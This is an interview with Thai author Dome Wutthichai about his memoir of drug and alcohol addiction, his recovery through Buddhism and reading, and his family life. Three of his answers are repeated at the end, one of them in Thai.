Dome Wutthichai's new memoir exposes his past vices and the path to recovery

If you were given the chance to go back and redo your past, what would it be? To say sorry to someone you have loved dearly but unintentionally wounded him or her? To avoid a detour that kept you lost in a maze of self-delusion for what felt like an eternity? Erotic-writer-turned-semi-spiritual-columnist Dome Wutthichai responds to this hypothetical musing with an equally enigmatic quip.
Yes, he would have liked to skip on all the vices - hemps and amphetamine, smoking and drinking spree - that he has unwittingly exposed himself to for several years. No, he would not have asked for any change. Why? Because that past, however embarrassing it might have looked in retrospect, has played an indispensable role in turning out Dome the man as he is today.
"Frankly, I'd not change anything," said the 52-year-old. "My past has made me who I am now. And I am totally happy with my present."
A few who have known Wutthichai Khianprasert, Dome's real name, 20 years ago may be taken aback by his new completely sober persona. In the mid-1980s, his name was associated mostly with writings of the saucy, sexy type. His personal life was more or less a mirror. In his no-holds-barred memoirs, Kwanfai Lae Sairung (Smoke and Rainbow), Dome recounts his hedonistic indulgence in drugs and drunkenness. Interestingly, he succumbed to the temptations relatively late: in his early thirties and as a married man with one daughter. And the price was dear. For awhile, his marriage teetered on the brink of collapse. He could not write. One by one, the valuable items in his small town house had to be pawned, among them the wedding rings that never returned. He shifted from one job to another - selling plants and old trinkets at Chatuchak Weekend Market and near Khlong Lot, hawking Chinese dumplings made by his wife from door to door, begging his old boss for a job as a proofreader (but he blew this second chance quickly after being caught by police for smoking marijuana and thrown into jail - and not for the last time either).
Yet, in that very abyss, Dome's yearning for writing never dissipated. A Short Story to Turn You On, featured in 'Outlook' today, is a wonderful fruit of this odd juncture, when he finally made up his mind that "from now on, my life is about writing, everything else is secondary".
How did you manage to get back to writing this short story?
Hmm ... it's definitely not autobiographical. At that time, I was struggling to write again after a long long spell of absence from the literary world. The story behind it is not much different from any other fictional works - I was inspired by what I had witnessed around me. I mixed characters of different people here and there; the setting was a combination of reality and my own imagination. I have to say I am so grateful to Khun Suchart Sawadsri, who edited and published it in his magazine, Chor Karaked. To have a story in that prestigious publication does give me more confidence to continue writing.
Besides a couple of short stories, you have been penning more essays based on [your] real-life experiences than fiction. Does it have something to do with your turning to study Buddhism in later years? Does that make you look at the [inner and outer] world as it is instead of as what it might be in your imagination?
First of all, I must say that I am not that devout as a practitioner [of dharma]. I have been interested in learning Buddha's teachings, but there are several levels and it depends on each individual to pursue the path. I believe that dharma does benefit our lives; it can help us to suffer less.
I think the reason that my recent works have been more of that genre is because when I resumed writing again, I did it as a series of journals on web board blogs. Then I started contributing to weekly and bi-monthly magazines. But I never give up the imaginative world. I still read short stories and novels, and hold on to the dream of writing some in the future. I think the more you understand the world, the more you can imagine. I just have to start doing it [writing fiction] seriously one day.
Your memoirs, 'Kwanfai Lae Sairung (Smoke and Rainbow)', reveals a lot of your past. How did you get to be that brave?
I'd never planned on writing this memoir. The person who lighted up the idea and personally asked me to do so was Khun Kwan Piang-hathai, my former boss. She knows well what I have been through. So she asked me to share my life in hopes that it could also serve as a lesson for others. At first, she was thinking about distributing the book either free of charge or at a very low price. But just as I was finishing it, there was an announcement for the Nai-in Awards contest. So I asked for her permission to submit it. [The book passed into the final round and was one of the three shortlisted, published by Amarin Printing that year.]Before writing that book, I was concerned about the feelings of two women: my wife and my daughter. I wasn't sure whether they might feel a bit awkward. But they said it was fine with them.
I think my mistakes might serve as a lesson for others to learn from. After all, past mistakes are the past. I am no longer that man. I do believe that a mistake can be a good teacher - because it teaches us through making us suffer, so much so that we will never want to repeat it again.
In several essays, you talk about how you owe it to your family for being able to live a simple, happy life as now. Can you elaborate?
The three of us are just an ordinary family. But I am lucky that my wife has never forced me to make money as the sole pursuit of our lives. We share a lot in ideas and attitudes. That not everything is perfect, but we can be happy in our own way. My daughter may have had a difficult time in her early years, but things got better as time went by. Up until now she has never done anything to worry us as parents. Even though we are not rich, I'd like to say how I feel so contented, so happy with my wife and daughter, and thus with myself.
You mention several times in your works about the value of reading. Could you share how it has influenced you as a person?
Reading is everything in my life. It is joy. It is learning, be it from others, or about oneself. Reading prompts me to write. Had I never read works by [reformist monk and founder of Suan Mokkh Forest Monastery] Buddhadasa Bhikkhu, I think I might still be trapped in the realm of vices with no hope for redemption.
Reading books on the computer from the internet opened my world to the cyberspace, which has radically changed my life. It gave me an opportunity to return to writing once again. Reading gives me imagination and knowledge in all sorts of things, from leisure matters to the serious stuff, from simple dharma to the profound ones. But true dharma cannot rely on reading alone. You have to practise it. And at the end of it, you have to read yourself and the truth of life. Everything in my life begins with reading.
How about travelling?
I am not after any particular goal. But as I travel around from place to place, I have come across so many lives, and it does make me feel that everyone on this earth are brothers and sisters. And I am not saying it as only a beautiful but abstract rhetoric. I have made friends with people from far-away lands, the ethnic minorities, the stateless people. And I believe that friendship between humans does exist and is transcendental.
And your ultimate goal, secular as well as spiritual?
Honestly, my interest in dharma is not to become enlightened in this life. I just try to make my life as free from suffering as possible. Ever since I turned my back to all those vices and took up studying dharma, I feel much lighter, more peaceful. There may be some bad moments, but they don't last as long. So the more we practise spiritually, the more easily we can live in this world. There is no need to escape it.

Before writing that book, I was concerned about the feelings of two women: my wife and my daughter. I wasnt sure whether they might feel a bit awkward. But they said its fine with them.

I am not after any particular goal. But as I travel around from place to place, I have come across so many lives, and it does make feel how everyone on this earth are brothers and sisters. And I am not saying it as only a beautiful but abstract rhetoric. I have made friends with people from the far-away lands, the ethnic minorities, the stateless people. And I believe that friendship between humans does exist and is transcendental.

Honestly, my interest in dharma is not to become enlightened in this life. I just try to make my life as free from suffering as possible. Ever since I turned my back to all those vices and took up studying dharma, I feel much lighter, more peaceful. There may be some bad moments, but they dont last as long. So the more we practice spiritually, the more easily we can live in this world. There is no need to escape it.
พูดตามตรง ที่ผมสนใจธรรมะ ไม่ได้เพื่อการบรรลุธรรม เพียงแต่อยากทำให้ชีวิตเป็นอิสระจากความทุกข์ให้มากที่สุดเท่าที่จะเป็นไปได้ ตั้งแต่ผมหันหลังให้กับอบายมุขและเริ่มศึกษาธรรมะ ผมรู้สึกเบาสบายมากขึ้น สงบขึ้น อาจจะมีช่วงเวลาที่ยากลำบากอยู่บ้าง แต่ก็อยู่ได้ไม่นาน ยิ่งเราฝึกฝนทางจิตวิญญาณมากขึ้น เราก็ยิ่งอยูในโลกใบนี้ได้ง่ายขึ้น ไม่จำเป็นจะต้องหลีกหนีไปไหน
